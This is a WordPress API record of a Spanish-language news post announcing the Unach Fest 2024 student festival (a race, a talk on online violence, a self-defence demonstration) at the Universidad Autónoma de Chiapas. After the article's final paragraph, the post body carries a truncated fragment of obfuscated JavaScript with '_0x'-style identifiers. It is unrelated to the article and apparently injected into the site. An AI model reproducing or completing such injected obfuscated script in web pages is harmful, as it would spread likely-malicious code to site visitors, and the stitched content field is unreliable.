{"id":17441,"date":"2024-08-23T03:57:15","date_gmt":"2024-08-23T03:57:15","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17441"},"modified":"2024-08-23T03:57:15","modified_gmt":"2024-08-23T03:57:15","slug":"anuncian-el-unach-fest-2024-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17441","title":{"rendered":"Anuncian el Unach Fest 2024 en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/WhatsApp-Image-2024-08-22-at-4.18.29-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-17442\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/WhatsApp-Image-2024-08-22-at-4.18.29-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/WhatsApp-Image-2024-08-22-at-4.18.29-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/WhatsApp-Image-2024-08-22-at-4.18.29-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/WhatsApp-Image-2024-08-22-at-4.18.29-PM-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/WhatsApp-Image-2024-08-22-at-4.18.29-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>22 de agosto del 2024. San Crist\u00f3bal de Las Casas.- Las responsables de eventos especiales del SIREDU Altos y Meseta Comiteca, Magali Estrada y Jenny Ovalle, han anunciado la programaci\u00f3n de Unach Fest 2024, un evento que promete tres d\u00edas de actividades dirigidas a la comunidad estudiantil y a la ciudadan\u00eda en general. El festival se llevar\u00e1 a cabo del 27 al 29 de agosto en diversas sedes de la Universidad Aut\u00f3noma de Chiapas (Unach).<\/p>\n\n\n\n<p>La inauguraci\u00f3n del festival tendr\u00e1 lugar el 27 de agosto con una carrera de 5 kil\u00f3metros en el Sedem, a partir de las 8 de la ma\u00f1ana. Esta carrera est\u00e1 abierta a todos los interesados, y se premiar\u00e1 a los tres primeros lugares en las categor\u00edas varonil y femenil.<\/p>\n\n\n\n<p>El segundo d\u00eda, 28 de agosto, en la Facultad de Derecho, se realizar\u00e1 una charla sobre la violencia psicol\u00f3gica en redes sociales, impartida por el psic\u00f3logo familiar Cristian Villareal. Esta actividad busca sensibilizar y educar sobre los impactos de la violencia en l\u00ednea.<\/p>\n\n\n\n<p>El cierre del evento, el 29 de agosto, ser\u00e1 en la Facultad de Ciencias Sociales, donde se ofrecer\u00e1 una demostraci\u00f3n de defensa personal a partir de las 10 de la ma\u00f1ana. Adem\u00e1s, se llevar\u00e1 a cabo una activaci\u00f3n f\u00edsica con Luis Villafuerte y, para culminar la jornada, se presentar\u00e1 un grupo musical que pondr\u00e1 el broche de oro a UNACH FEST 2024.<\/p>\n\n\n\n<p>Magali Estrada y Jenny Ovalle invitaron a toda la comunidad universitaria y a la poblaci\u00f3n en general a participar en estas actividades que promueven la convivencia, la salud f\u00edsica y el bienestar emocional.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 22 de agosto del 2024. San Crist\u00f3bal de Las Casas.- Las responsables de eventos especiales del SIREDU Altos y Meseta Comiteca, Magali Estrada y Jenny Ovalle, han anunciado la programaci\u00f3n de Unach Fest 2024, un evento que promete tres d\u00edas de actividades dirigidas a la comunidad estudiantil y a la ciudadan\u00eda en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17442,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17441","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17441","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17441"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17441\/revisions"}],"predecessor-version":[{"id":17443,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17441\/revisions\/17443"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17442"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17441"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17441"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17441"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}